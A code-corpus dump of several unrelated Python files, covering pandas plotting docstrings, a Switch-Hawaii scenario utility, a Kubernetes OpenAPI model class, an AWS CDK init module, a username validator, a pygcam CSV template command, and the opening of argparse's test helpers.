scipy.stats.gaussian_kde : Representation of a kernel-density
estimate using Gaussian kernels. This is the function used
internally to estimate the PDF.
Examples
--------
Given a Series of points randomly sampled from an unknown
distribution, estimate its PDF using KDE with automatic
bandwidth determination and plot the results, evaluating them at
1000 equally spaced points (default):
.. plot::
:context: close-figs
>>> s = pd.Series([1, 2, 2.5, 3, 3.5, 4, 5])
>>> ax = s.plot.kde()
A scalar bandwidth can be specified. Using a small bandwidth value can
lead to over-fitting, while using a large bandwidth value may result
in under-fitting:
.. plot::
:context: close-figs
>>> ax = s.plot.kde(bw_method=0.3)
.. plot::
:context: close-figs
>>> ax = s.plot.kde(bw_method=3)
Finally, the `ind` parameter determines the evaluation points for the
plot of the estimated PDF:
.. plot::
:context: close-figs
>>> ax = s.plot.kde(ind=[1, 2, 3, 4, 5])
For DataFrame, it works in the same way:
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'x': [1, 2, 2.5, 3, 3.5, 4, 5],
... 'y': [4, 4, 4.5, 5, 5.5, 6, 6],
... })
>>> ax = df.plot.kde()
A scalar bandwidth can be specified. Using a small bandwidth value can
lead to over-fitting, while using a large bandwidth value may result
in under-fitting:
.. plot::
:context: close-figs
>>> ax = df.plot.kde(bw_method=0.3)
.. plot::
:context: close-figs
>>> ax = df.plot.kde(bw_method=3)
Finally, the `ind` parameter determines the evaluation points for the
plot of the estimated PDF:
.. plot::
:context: close-figs
>>> ax = df.plot.kde(ind=[1, 2, 3, 4, 5, 6])
"""
return self(kind="kde", bw_method=bw_method, ind=ind, **kwargs)
density = kde
def area(self, x=None, y=None, **kwargs):
"""
Draw a stacked area plot.
An area plot displays quantitative data visually.
This function wraps the matplotlib area function.
Parameters
----------
x : label or position, optional
Coordinates for the X axis. By default uses the index.
y : label or position, optional
Column to plot. By default uses all columns.
stacked : bool, default True
Area plots are stacked by default. Set to False to create an
unstacked plot.
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
matplotlib.axes.Axes or numpy.ndarray
Area plot, or array of area plots if subplots is True.
See Also
--------
DataFrame.plot : Make plots of DataFrame using matplotlib / pylab.
Examples
--------
Draw an area plot based on basic business metrics:
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'sales': [3, 2, 3, 9, 10, 6],
... 'signups': [5, 5, 6, 12, 14, 13],
... 'visits': [20, 42, 28, 62, 81, 50],
... }, index=pd.date_range(start='2018/01/01', end='2018/07/01',
... freq='M'))
>>> ax = df.plot.area()
Area plots are stacked by default. To produce an unstacked plot,
pass ``stacked=False``:
.. plot::
:context: close-figs
>>> ax = df.plot.area(stacked=False)
Draw an area plot for a single column:
.. plot::
:context: close-figs
>>> ax = df.plot.area(y='sales')
Draw with a different `x`:
.. plot::
:context: close-figs
>>> df = pd.DataFrame({
... 'sales': [3, 2, 3],
... 'visits': [20, 42, 28],
... 'day': [1, 2, 3],
... })
>>> ax = df.plot.area(x='day')
"""
return self(kind="area", x=x, y=y, **kwargs)
def pie(self, **kwargs):
"""
Generate a pie plot.
A pie plot is a proportional representation of the numerical data in a
column. This function wraps :meth:`matplotlib.pyplot.pie` for the
specified column. If no column reference is passed and
``subplots=True`` a pie plot is drawn for each numerical column
independently.
Parameters
----------
y : int or label, optional
Label or position of the column to plot.
If not provided, ``subplots=True`` argument must be passed.
**kwargs
Keyword arguments to pass on to :meth:`DataFrame.plot`.
Returns
-------
matplotlib.axes.Axes or np.ndarray of them
A NumPy array is returned when `subplots` is True.
See Also
--------
Series.plot.pie : Generate a pie plot for a Series.
DataFrame.plot : Make plots of a DataFrame.
Examples
--------
In the example below we have a DataFrame with information about
the planets' mass and radius. We pass the 'mass' column to the
pie function to get a pie plot.
.. plot::
:context: close-figs
>>> df = pd.DataFrame({'mass': [0.330, 4.87 , 5.97],
... 'radius': [2439.7, 6051.8, 6378.1]},
... index=['Mercury', 'Venus', 'Earth'])
>>> plot = df.plot.pie(y='mass', figsize=(5, 5))
.. plot::
:context: close-figs
>>> plot = df.plot.pie(subplots=True, figsize=(11, 6))
"""
if (
isinstance(self._parent, ABCDataFrame)
and kwargs.get("y", None) is None
and not kwargs.get("subplots", False)
):
raise ValueError("pie requires either y column or 'subplots=True'")
return self(kind="pie", **kwargs)
def scatter(self, x, y, s=None, c=None, **kwargs):
"""
Create a scatter plot with varying marker point size and color.
The coordinates of each point are defined by two dataframe columns and
filled circles are used to represent each point. This kind of plot is
useful to see complex correlations between two variables. Points could
be for instance natural 2D coordinates like longitude and latitude in
a map or, in general, any pair of metrics that can be plotted against
each other.
Parameters
----------
x : int or str
The column name or column position to be used as horizontal
coordinates for each point.
y : int or str
The column name or column position to be used as vertical
coordinates for each point.
s : str, scalar or array_like, optional
The size of each point. Possible values are:
- A string with the name of the column to be used for marker's size.
- A single scalar so all points have the same size.
- A sequence of scalars, which will be recycled for each point's size.
For instance, when passing [2, 14] the point sizes will alternate
between 2 and 14.
.. versionchanged:: 1.1.0
c : str, int or array_like, optional
The color of each point. Possible values are:
- A single color string referred to by name, RGB or RGBA code,
for instance 'red' or '#a98d19'.
- A sequence of color strings referred to by name, RGB or RGBA
code, which will be recycled for each point's color. For
instance, with ['green', 'yellow'] the points will alternate
between green and yellow.
- A column name or position whose values will be used to color the
marker points according to a colormap.
**kwargs
Keyword arguments to pass on to :meth:`DataFrame.plot`.
Returns
-------
:class:`matplotlib.axes.Axes` or numpy.ndarray of them
See Also
--------
matplotlib.pyplot.scatter : Scatter plot using multiple input data
formats.
Examples
--------
Let's see how to draw a scatter plot using coordinates from the values
in a DataFrame's columns.
.. plot::
:context: close-figs
>>> df = pd.DataFrame([[5.1, 3.5, 0], [4.9, 3.0, 0], [7.0, 3.2, 1],
... [6.4, 3.2, 1], [5.9, 3.0, 2]],
... columns=['length', 'width', 'species'])
>>> ax1 = df.plot.scatter(x='length',
... y='width',
... c='DarkBlue')
And now with the color determined by a column as well.
.. plot::
:context: close-figs
>>> ax2 = df.plot.scatter(x='length',
... y='width',
... c='species',
... colormap='viridis')
"""
return self(kind="scatter", x=x, y=y, s=s, c=c, **kwargs)
def hexbin(self, x, y, C=None, reduce_C_function=None, gridsize=None, **kwargs):
"""
Generate a hexagonal binning plot.
Generate a hexagonal binning plot of `x` versus `y`. If `C` is `None`
(the default), this is a histogram of the number of occurrences
of the observations at ``(x[i], y[i])``.
If `C` is specified, it defines the values at the given coordinates
``(x[i], y[i])``. These values are accumulated for each hexagonal
bin and then reduced according to `reduce_C_function`, which
defaults to NumPy's mean function (:meth:`numpy.mean`).
(If `C` is specified, it must also be a 1-D sequence
of the same length as `x` and `y`, or a column label.)
Parameters
----------
x : int or str
The column label or position for x points.
y : int or str
The column label or position for y points.
C : int or str, optional
The column label or position for the value of `(x, y)` point.
reduce_C_function : callable, default `np.mean`
Function of one argument that reduces all the values in a bin to
a single number (e.g. `np.mean`, `np.max`, `np.sum`, `np.std`).
gridsize : int or tuple of (int, int), default 100
The number of hexagons in the x-direction.
The corresponding number of hexagons in the y-direction is
chosen in a way that the hexagons are approximately regular.
Alternatively, gridsize can be a tuple with two elements
specifying the number of hexagons in the x-direction and the
y-direction.
**kwargs
Additional keyword arguments are documented in
:meth:`DataFrame.plot`.
Returns
-------
matplotlib.AxesSubplot
The matplotlib ``Axes`` on which the hexbin is plotted.
See Also
--------
DataFrame.plot : Make plots of a DataFrame.
matplotlib.pyplot.hexbin : Hexagonal binning plot using matplotlib,
the matplotlib function that is used under the hood.
Examples
--------
The following examples are generated with random data from
a normal distribution.
.. plot::
:context: close-figs
>>> n = 10000
>>> df = pd.DataFrame({'x': np.random.randn(n),
... 'y': np.random.randn(n)})
>>> ax = df.plot.hexbin(x='x', y='y', gridsize=20)
The next example uses `C` and `np.sum` as `reduce_C_function`.
Note that `'observations'` values range from 1 to 5 but the resulting
plot shows values above 25. This is because of the
`reduce_C_function`.
.. plot::
:context: close-figs
>>> n = 500
>>> df = pd.DataFrame({
... 'coord_x': np.random.uniform(-3, 3, size=n),
... 'coord_y': np.random.uniform(30, 50, size=n),
... 'observations': np.random.randint(1,5, size=n)
... })
>>> ax = df.plot.hexbin(x='coord_x',
... y='coord_y',
... C='observations',
... reduce_C_function=np.sum,
... gridsize=10,
... cmap="viridis")
"""
if reduce_C_function is not None:
kwargs["reduce_C_function"] = reduce_C_function
if gridsize is not None:
kwargs["gridsize"] = gridsize
return self(kind="hexbin", x=x, y=y, C=C, **kwargs)
_backends = {}
def _find_backend(backend: str):
"""
Find a pandas plotting backend.
Parameters
----------
backend : str
The identifier for the backend. Either an entrypoint item registered
with pkg_resources, or a module name.
Notes
-----
Modifies _backends with imported backends as a side effect.
Returns
-------
types.ModuleType
The imported backend.
"""
import pkg_resources # Delay import for performance.
for entry_point in pkg_resources.iter_entry_points("pandas_plotting_backends"):
if entry_point.name == "matplotlib":
# matplotlib is an optional dependency. When
# missing, this would raise.
continue
_backends[entry_point.name] = entry_point.load()
try:
return _backends[backend]
except KeyError:
# Fall back to unregistered, module name approach.
try:
module = importlib.import_module(backend)
except ImportError:
# We re-raise later on.
pass
else:
if hasattr(module, "plot"):
# Validate that the interface is implemented when the option
# is set, rather than at plot time.
_backends[backend] = module
return module
raise ValueError(
f"Could not find plotting backend '{backend}'. Ensure that you've installed "
f"the package providing the '{backend}' entrypoint, or that the package has a "
"top-level `.plot` method."
)
def _get_plot_backend(backend=None):
"""
Return the plotting backend to use (e.g. `pandas.plotting._matplotlib`).
The plotting system of pandas has been using matplotlib, but the idea here
is that it can also work with other third-party backends. In the future,
this function will return the backend from a pandas option, and all the
rest of the code in this file will use the backend specified there for the
plotting.
The backend is imported lazily, as matplotlib is a soft dependency, and
pandas can be used without it being installed.
"""
backend = backend or get_option("plotting.backend")
if backend == "matplotlib":
# Because matplotlib is an optional dependency and first-party backend,
# we need to attempt an import here to raise an ImportError if needed.
try:
import pandas.plotting._matplotlib as module
except ImportError:
raise ImportError(
"matplotlib is required for plotting when the "
'default backend "matplotlib" is selected.'
) from None
_backends["matplotlib"] = module
if backend in _backends:
return _backends[backend]
module = _find_backend(backend)
_backends[backend] = module
return module
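# A minimal usage sketch (not part of the original module): assuming matplotlib
# is installed, resolving the default backend imports and caches
# pandas.plotting._matplotlib, so a second lookup returns the same module
# without re-importing.
#
# >>> mod = _get_plot_backend("matplotlib")   # doctest: +SKIP
# >>> mod is _get_plot_backend("matplotlib")  # doctest: +SKIP
# True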
|
py
|
1a5f010f0ce5c521414c777afb60d18dd8ff2559
|
import argparse, os, collections
try:
import fcntl
def flock(f):
fcntl.flock(f, fcntl.LOCK_EX)
def funlock(f):
fcntl.flock(f, fcntl.LOCK_UN)
except ImportError:
# probably using windows
# rely on opportunistic file writing (hope that scenarios aren't
# added to completed_scenarios.txt at the same time by parallel processes)
# TODO: add support for file locking on windows, e.g., like
# https://www.safaribooksonline.com/library/view/python-cookbook/0596001673/ch04s25.html
def flock(f):
pass
def funlock(f):
pass
def iterify(item):
"""Return an iterable for the one or more items passed."""
if isinstance(item, basestring):
i = iter([item])
else:
try:
# check if it's iterable
i = iter(item)
except TypeError:
i = iter([item])
return i
class AddModuleAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
for m in iterify(values):
setattr(namespace, m, True)
class RemoveModuleAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
for m in iterify(values):
setattr(namespace, m, False)
class AddListAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if getattr(namespace, self.dest) is None:
setattr(namespace, self.dest, list())
getattr(namespace, self.dest).extend(iterify(values))
# define a standard argument parser, which can be used to setup scenarios
# NOTE: you can't safely use default values here, because those end up being
# assigned to cmd_line_args(), and then they override any values set for the
# standard scenarios.
parser = argparse.ArgumentParser(description='Solve one or more Switch-Hawaii scenarios.')
parser.add_argument('--inputs', dest='inputs_dir')
parser.add_argument('--inputs_subdir')
parser.add_argument('--outputs', dest='outputs_dir')
parser.add_argument('--scenario', action=AddListAction, dest='scenario_to_run')
parser.add_argument('--scenarios', action=AddListAction, nargs='+', dest='scenario_to_run')
parser.add_argument('--scenario_name')
parser.add_argument('--exclude', action=AddModuleAction, dest='exclude_module', nargs='+')
parser.add_argument('-n', action=RemoveModuleAction, dest='exclude_module')
parser.add_argument('--include', action=AddModuleAction, dest='include_module', nargs='+')
parser.add_argument('-y', action=AddModuleAction, dest='include_module')
parser.add_argument(action=AddModuleAction, dest='include_module', nargs='*')
def args_dict(*a):
"""call the parser to get the args, then return them as a dictionary, omitting None's'"""
return {k: v for k, v in vars(parser.parse_args(*a)).iteritems() if v is not None}
# report current command line arguments for use by various functions
# This is a function instead of a constant, so users can call
# scenarios.parser.add_argument() to add arguments of their own before evaluation
def cmd_line_args():
return args_dict()
def get_required_scenario_names():
"""Return list of names of scenario(s) that were requested or defined from the command line
via --scenario[s] or --scenario_name.
Return an empty list if none were requested/defined."""
a = cmd_line_args()
if "scenario_to_run" in a:
return a["scenario_to_run"]
elif "scenario_name" in a or not os.path.isfile('scenarios_to_run.txt'):
# They have defined one specific scenario on the command line, which is not based on any standard scenario,
# or there are no standard scenarios.
# Return a no-name scenario, which indicates to build the scenario without referring to any standard scenario.
return ['']
else:
# no specific scenarios were requested on the command line; run the standard scenarios instead
return []
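# Illustrative behaviour of get_required_scenario_names() for some
# hypothetical command lines (assuming scenarios_to_run.txt exists):
#   --scenarios base high_oil  -> ['base', 'high_oil']
#   --scenario_name custom     -> ['']  (build the scenario from command-line args only)
#   (no scenario flags)        -> []    (fall back to the standard scenarios)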
def start_next_standard_scenario():
"""find the next scenario definition in 'scenarios_to_run.txt' that isn't reported
as having been completed in 'completed_scenarios.txt'.
Then report it as completed and return the scenario arguments
(including any modifications from the command line)."""
scenarios_list = get_standard_scenarios_dict()
for (s, args) in scenarios_list.iteritems():
if scenario_already_run(s):
continue
else:
return merge_scenarios(args, cmd_line_args())
return None # no more scenarios to run
def get_scenario_args(scenario):
"""Return the arguments for the specified standard scenario, amended with any command-line arguments.
This may also be called with an empty scenario name ('') to define a scenario using only command-line arguments."""
if scenario == '':
return merge_scenarios(cmd_line_args())
else:
scenario_list = get_standard_scenarios_dict()
if scenario not in scenario_list:
raise RuntimeError("Scenario {s} has not been defined.".format(s=scenario))
else:
return merge_scenarios(scenario_list[scenario], cmd_line_args())
def get_standard_scenarios_dict():
"""Return collection of standard scenarios, as defined in scenarios_to_run.txt.
They are returned as an OrderedDict with keys equal to the scenario names and values
that are each a dictionary of arguments for that scenario."""
# note: we read the list from the disk each time so that we get a fresher version
# if the standard list is changed during a long solution effort.
with open('scenarios_to_run.txt', 'r') as f:
# wait for exclusive access to the file (to avoid reading while the file is being changed)
flock(f)
scenarios_list = list(f.read().splitlines()) # note: ignores presence/absence of \n at end of file
funlock(f)
args_list = [args_dict(s.split(' ')) for s in scenarios_list]
return collections.OrderedDict([(s["scenario_name"], s) for s in args_list])
def merge_scenarios(*scenarios):
# combine scenarios: start with the first and then apply most settings from later ones
# but concatenate "tag" entries and remove "scenario_to_run" entries
d = dict(tag='')
for s in scenarios:
t1 = d["tag"]
t2 = s.get("tag", "")
s["tag"] = t1 + ("" if t1 == "" or t2 == "" else "_") + t2
d.update(s)
if 'scenario_to_run' in d:
del d['scenario_to_run']
return d
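# A small worked example of merge_scenarios() with hypothetical settings:
# later scenarios override earlier settings, "tag" values are concatenated
# with "_", "scenario_to_run" is dropped, and the input dicts are modified
# in place. (Dict key order may vary.)
#
# >>> merge_scenarios({'tag': 'base', 'inputs_dir': 'inputs'},
# ...                 {'tag': 'high_oil', 'scenario_to_run': ['base']})
# {'tag': 'base_high_oil', 'inputs_dir': 'inputs'}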
def report_completed_scenario(scenario):
scenario_already_run(scenario)
def scenario_already_run(scenario):
"""Add the specified scenario to the list in completed_scenarios.txt.
Return False if it wasn't there already."""
with open('completed_scenarios.txt', 'a+') as f:
# wait for exclusive access to the list (to avoid writing the same scenario twice in a race condition)
flock(f)
# file starts with pointer at end; move to start
f.seek(0, 0)
if scenario + '\n' in f:
already_run = True
else:
already_run = False
# append name to the list (will always go at end, because file was opened in 'a' mode)
f.write(scenario + '\n')
funlock(f)
return already_run
|
py
|
1a5f01426f329129d21784ed1664d2e6cc6d5248
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.18
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V1alpha1WebhookThrottleConfig(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'burst': 'int',
'qps': 'int'
}
attribute_map = {
'burst': 'burst',
'qps': 'qps'
}
def __init__(self, burst=None, qps=None, local_vars_configuration=None): # noqa: E501
"""V1alpha1WebhookThrottleConfig - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._burst = None
self._qps = None
self.discriminator = None
if burst is not None:
self.burst = burst
if qps is not None:
self.qps = qps
@property
def burst(self):
"""Gets the burst of this V1alpha1WebhookThrottleConfig. # noqa: E501
ThrottleBurst is the maximum number of events sent at the same moment default 15 QPS # noqa: E501
:return: The burst of this V1alpha1WebhookThrottleConfig. # noqa: E501
:rtype: int
"""
return self._burst
@burst.setter
def burst(self, burst):
"""Sets the burst of this V1alpha1WebhookThrottleConfig.
ThrottleBurst is the maximum number of events sent at the same moment default 15 QPS # noqa: E501
:param burst: The burst of this V1alpha1WebhookThrottleConfig. # noqa: E501
:type: int
"""
self._burst = burst
@property
def qps(self):
"""Gets the qps of this V1alpha1WebhookThrottleConfig. # noqa: E501
ThrottleQPS maximum number of batches per second default 10 QPS # noqa: E501
:return: The qps of this V1alpha1WebhookThrottleConfig. # noqa: E501
:rtype: int
"""
return self._qps
@qps.setter
def qps(self, qps):
"""Sets the qps of this V1alpha1WebhookThrottleConfig.
ThrottleQPS maximum number of batches per second default 10 QPS # noqa: E501
:param qps: The qps of this V1alpha1WebhookThrottleConfig. # noqa: E501
:type: int
"""
self._qps = qps
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1WebhookThrottleConfig):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, V1alpha1WebhookThrottleConfig):
return True
return self.to_dict() != other.to_dict()
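# A minimal usage sketch added for illustration (values are illustrative,
# not API-server defaults):
#
# >>> cfg = V1alpha1WebhookThrottleConfig(burst=15, qps=10)
# >>> cfg.to_dict()
# {'burst': 15, 'qps': 10}
# >>> cfg == V1alpha1WebhookThrottleConfig(burst=15, qps=10)
# True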
|
py
|
1a5f016eb2fdc4f75061c30a71cfe4220aaa17eb
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
import aws_cdk.aws_autoscaling._jsii
import aws_cdk.aws_cloudwatch._jsii
import aws_cdk.aws_ec2._jsii
import aws_cdk.aws_elasticloadbalancing._jsii
import aws_cdk.aws_elasticloadbalancingv2._jsii
import aws_cdk.aws_iam._jsii
import aws_cdk.aws_lambda._jsii
import aws_cdk.aws_s3._jsii
import aws_cdk.core._jsii
import aws_cdk.custom_resources._jsii
import constructs._jsii
__jsii_assembly__ = jsii.JSIIAssembly.load(
"@aws-cdk/aws-codedeploy",
"1.118.0",
__name__[0:-6],
"[email protected]",
)
__all__ = [
"__jsii_assembly__",
]
publication.publish()
|
py
|
1a5f02268307081fb573c3d45900eab8cbcb0d6f
|
#!/usr/bin/env python3
import re
def validate_user(username, minlen):
"""Checks if the received username matches the required conditions."""
if type(username) != str:
raise TypeError("username must be a string")
if minlen < 1:
raise ValueError("minlen must be at least 1")
# Usernames can't be shorter than minlen
if len(username) < minlen:
return False
# Usernames can only use lowercase letters, numbers, dots and underscores
if not re.match('^[a-z0-9._]*$', username):
return False
# Usernames can't begin with a number
if username[0].isnumeric():
return False
if username[0] == "_":
return False
if username[0] == ".":
return False
return True
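if __name__ == "__main__":
    # Illustrative checks of the rules above (hypothetical usernames):
    assert validate_user("blue.kale", 3)        # lowercase letters and a dot: valid
    assert not validate_user("1kale", 3)        # starts with a number: invalid
    assert not validate_user(".kale", 3)        # starts with a dot: invalid
    assert not validate_user("Blue.Kale", 3)    # uppercase letters fail the regex: invalid
    print("All example checks passed.")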
|
py
|
1a5f0499048bb1ac33215b317b7f4e022d788d92
|
"""
.. Generate a CSV file template used to define mitigation policies
.. codeauthor:: Rich Plevin <[email protected]>
.. Copyright (c) 2020 Richard Plevin
See the https://opensource.org/licenses/MIT for license details.
"""
#
# TBD: need to merge aspects of ZEVPolicy into this, e.g., handling of
# TBD: --include flag, including "market" in CSV output.
#
# There are two basic policy types: RES policies (ZEV and RES) and technology
# forcing policies that directly change efficiency or coefficients over time.
#
from ..subcommand import SubcommandABC, clean_help
from ..log import getLogger
_logger = getLogger(__name__)
def element_path(elt):
"""
Walk up the XML structure from the given element, producing a tuple with the
names of the region, sector, subsector, technology, and input found in this
"path".
:param elt: (lxml.etree.Element) an "input" element to start from
:return: tuple of strings: (region, sector, subsector, technology, input)
"""
input = elt.attrib['name']
sector = subsector = technology = region = None
for node in elt.iterancestors(): # walk up the hierarchy
tag = node.tag
attr = node.attrib
if tag == 'period':
continue
elif tag == 'location-info':
sector = attr['sector-name']
subsector = attr['subsector-name']
elif tag == 'region':
region = attr['name']
break
elif tag == 'supplysector':
sector = attr['name']
elif tag in ('stub-technology', 'technology'):
technology = attr['name']
elif tag in ('subsector', 'tranSubsector'):
subsector = attr['name']
elif tag == 'global-technology-database':
break
return (region, sector, subsector, technology, input)
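# A hedged illustration (the names are hypothetical, not taken from GCAM data):
# for a minicam-energy-input element nested under
# region/supplysector/subsector/stub-technology, element_path() would return
# something like:
#   ('USA', 'comm heating', 'gas heating', 'gas furnace', 'delivered gas')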
def save_template(f, args, years, xml_file, xpath, which):
from ..config import getParam
from ..utils import pathjoin
from ..XMLFile import XMLFile
# TBD: Make this more flexible. Create config param for this, let user override?
gcamDir = getParam('GCAM.RefWorkspace', section=args.projectName)
pathname = pathjoin(gcamDir, 'input', 'gcamdata', 'xml', xml_file)
_logger.info("Reading {}".format(pathname))
xml = XMLFile(pathname)
root = xml.getRoot()
nodes = root.xpath(xpath)
paths = sorted(set([element_path(node) for node in nodes])) # use 'set' to remove dupes
# filter out sectors missing from cmdline arg, if specified
if args.sectors:
desired = []
sectors = set(args.sectors.split(','))
for path in paths:
if path[0] in sectors:
desired.append(path)
paths = desired
all_regions = set(root.xpath('//region/@name'))
if args.GCAM_USA:
all_regions = all_regions.difference(['USA']) # remove USA since states will be used
regions = args.regions.split(',') if args.regions else all_regions
regions = sorted(regions)
zeroes = ',0' * len(years) # fill in with zeroes for reading into a dataframe
# data values
for region in regions:
if region not in all_regions: # use only regions defined for this XML file
continue
for tup in paths:
f.write(which + ',' + region + ',')
f.write(','.join(tup))
f.write(zeroes + '\n')
DEFAULT_OUTPUT_FILE = '{target}_template.csv'
class CsvTemplateCommand(SubcommandABC):
def __init__(self, subparsers):
kwargs = {'help' : '''Dump combinations of regions, sectors, subsectors, techs, and fuels
for use in generating XML policy input files.'''}
super(CsvTemplateCommand, self).__init__('csvTemplate', subparsers, kwargs, group='project')
def addArgs(self, parser):
# positional argument
parser.add_argument('target', choices=['buildingTech', 'buildingElec', 'transportTech', 'RES', 'ZEV'],
help=clean_help('''The policy target.'''))
parser.add_argument('-i', '--include', action='append', default=None,
help=clean_help('''A colon (":") delimited list of comma-delimited sectors,
subsectors, and technologies to include in the CSV template file.
Example: "--include trn_pass_road_LDV_4W::BEV,FCEV" means include only two
technologies (BEV,FCEV), but for any subsector under the specified sector.
Multiple -I arguments are allowed.'''))
parser.add_argument('-o', '--outputFile', default=None,
help=clean_help('''The CSV file to create with lists of unique regions, sectors,
subsectors, technologies, and inputs. Default is "[GCAM.CsvTemplateDir]/{}".
Use an absolute path to generate the file to another location.'''.format(
DEFAULT_OUTPUT_FILE)))
parser.add_argument('-s', '--sectors', default=None,
help=clean_help('''A comma-delimited list of sectors to include in the generated template. Use quotes
around the argument if there are embedded blanks. By default, all known building technology
sectors are included.'''))
parser.add_argument('-r', '--regions', default=None,
help=clean_help('''A comma-delimited list of regions to include in the generated template.
By default all regions are included. '''))
parser.add_argument('-u', '--GCAM-USA', action="store_true",
help=clean_help('''If set, produce output compatible with GCAM-USA regions.'''))
parser.add_argument('-y', '--years', default='2015-2100',
help=clean_help('''A hyphen-separated range of timestep years to include in the generated template.
Default is "2015-2100"'''))
return parser
def run(self, args, tool):
from ..utils import pathjoin, validate_years, get_path
from ..config import getParam
from ..error import CommandlineError
years = validate_years(args.years)
if years is None:
raise CommandlineError('Year argument must be two integers separated by a hyphen, '
'with second > first. Got "{}"'.format(args.years))
target = args.target
outputFile = args.outputFile or DEFAULT_OUTPUT_FILE.format(target=target)
outputPath = get_path(outputFile, pathjoin(getParam("GCAM.ProjectDir"), "etc"))
# TBD: allow specification of full path to xml files?
if target == 'buildingTech':
main_xml_file = 'building_det.xml'
usa_xml_file = 'building_USA.xml'
main_xpath = '//supplysector/subsector/stub-technology/period/minicam-energy-input'
usa_xpath = '//global-technology-database/location-info/technology/period/minicam-energy-input'
elif target == 'buildingElec':
pass # TBD
elif target == 'transportTech':
pass # TBD
elif target == 'RES':
pass # TBD
elif target == 'ZEV':
pass # TBD
_logger.info('Writing %s', outputPath)
with open(outputPath, 'w') as f:
# column headers
f.write("which,region,market,sector,subsector,technology,input,")
f.write(','.join(map(str, years)))
f.write("\n")
save_template(f, args, years, main_xml_file, main_xpath, 'GCAM-32')
if args.GCAM_USA:
save_template(f, args, years, usa_xml_file, usa_xpath, 'GCAM-USA')
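# A hedged example of invoking this subcommand (the "gt" driver name is an
# assumption based on pygcam's command-line tool; adjust to your setup):
#
#   gt csvTemplate buildingTech -s comm_heating,resid_heating -y 2020-2050 \
#       -o building_tech_template.csv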
|
py
|
1a5f05e30b9fab993609463fb693b4ab0ad59bc1
|
# Author: Steven J. Bethard <[email protected]>.
import codecs
import inspect
import os
import shutil
import stat
import sys
import textwrap
import tempfile
import unittest
import argparse
from StringIO import StringIO
class StdIOBuffer(StringIO):
pass
from test import test_support
class TestCase(unittest.TestCase):
def assertEqual(self, obj1, obj2):
if obj1 != obj2:
print('')
print(repr(obj1))
print(repr(obj2))
print(obj1)
print(obj2)
super(TestCase, self).assertEqual(obj1, obj2)
def setUp(self):
# The tests assume that line wrapping occurs at 80 columns, but this
# behaviour can be overridden by setting the COLUMNS environment
# variable. To ensure that this assumption is true, unset COLUMNS.
env = test_support.EnvironmentVarGuard()
env.unset("COLUMNS")
self.addCleanup(env.__exit__)
class TempDirMixin(object):
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.old_dir = os.getcwd()
os.chdir(self.temp_dir)
def tearDown(self):
os.chdir(self.old_dir)
shutil.rmtree(self.temp_dir, True)
def create_readonly_file(self, filename):
file_path = os.path.join(self.temp_dir, filename)
with open(file_path, 'w') as file:
file.write(filename)
os.chmod(file_path, stat.S_IREAD)
class Sig(object):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
class NS(object):
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __repr__(self):
sorted_items = sorted(self.__dict__.items())
kwarg_str = ', '.join(['%s=%r' % tup for tup in sorted_items])
return '%s(%s)' % (type(self).__name__, kwarg_str)
__hash__ = None
def __eq__(self, other):
return vars(self) == vars(other)
def __ne__(self, other):
return not (self == other)
class ArgumentParserError(Exception):
def __init__(self, message, stdout=None, stderr=None, error_code=None):
Exception.__init__(self, message, stdout, stderr)
self.message = message
self.stdout = stdout
self.stderr = stderr
self.error_code = error_code
def stderr_to_parser_error(parse_args, *args, **kwargs):
# if this is being called recursively and stderr or stdout is already being
# redirected, simply call the function and let the enclosing function
# catch the exception
if isinstance(sys.stderr, StdIOBuffer) or isinstance(sys.stdout, StdIOBuffer):
return parse_args(*args, **kwargs)
# if this is not being called recursively, redirect stderr and
# use it as the ArgumentParserError message
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = StdIOBuffer()
sys.stderr = StdIOBuffer()
try:
try:
result = parse_args(*args, **kwargs)
for key in list(vars(result)):
if getattr(result, key) is sys.stdout:
setattr(result, key, old_stdout)
if getattr(result, key) is sys.stderr:
setattr(result, key, old_stderr)
return result
except SystemExit:
code = sys.exc_info()[1].code
stdout = sys.stdout.getvalue()
stderr = sys.stderr.getvalue()
raise ArgumentParserError("SystemExit", stdout, stderr, code)
finally:
sys.stdout = old_stdout
sys.stderr = old_stderr
class ErrorRaisingArgumentParser(argparse.ArgumentParser):
def parse_args(self, *args, **kwargs):
parse_args = super(ErrorRaisingArgumentParser, self).parse_args
return stderr_to_parser_error(parse_args, *args, **kwargs)
def exit(self, *args, **kwargs):
exit = super(ErrorRaisingArgumentParser, self).exit
return stderr_to_parser_error(exit, *args, **kwargs)
def error(self, *args, **kwargs):
